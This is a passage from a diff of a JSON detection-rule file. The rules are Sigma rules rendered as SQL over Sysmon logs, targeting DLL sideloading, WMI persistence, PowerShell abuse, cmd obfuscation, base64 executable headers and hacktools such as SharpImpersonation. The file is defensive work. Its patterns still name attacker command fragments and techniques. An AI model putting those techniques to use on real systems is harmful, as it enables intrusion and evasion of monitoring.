'\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" 
], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Other scripts" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Legitimate administration" + "Legitimate macro usage. 
Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. 
If you experience a lot of FP you could reduce the level to medium" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - SharpLDAPmonitor Execution", - "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "status": "experimental", - "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Potential Dosfuscation Activity", - "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", + "title": "Python Py2Exe Image Load", + "id": 
"cbb56d62-4060-40f7-9466-d8aaf3123f83", "status": "experimental", - "description": "Detects possible payload obfuscation via the commandline", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "author": "Patrick St. John, OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1027.002" ], "falsepositives": [ - "Unknown" + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description = 'Python Core' AND NOT ((Image LIKE '%Python%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_cmd_dosfuscation.yml" + "filename": "image_load_susp_python_image_load.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "title": "Suspicious WSMAN Provider Image Loads", 
+ "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((Image LIKE 
'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "image_load_wsman_provider_image_load.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", + "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", + "status": "test", + "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
+ "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "DLL Load By System Process From Suspicious Locations", + 
"id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "status": "experimental", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "Group Membership Reconnaissance Via Whoami.EXE", - "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", "status": "experimental", - "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_whoami_groups_discovery.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", - "status": "test", - "description": "Detects mshta loaded 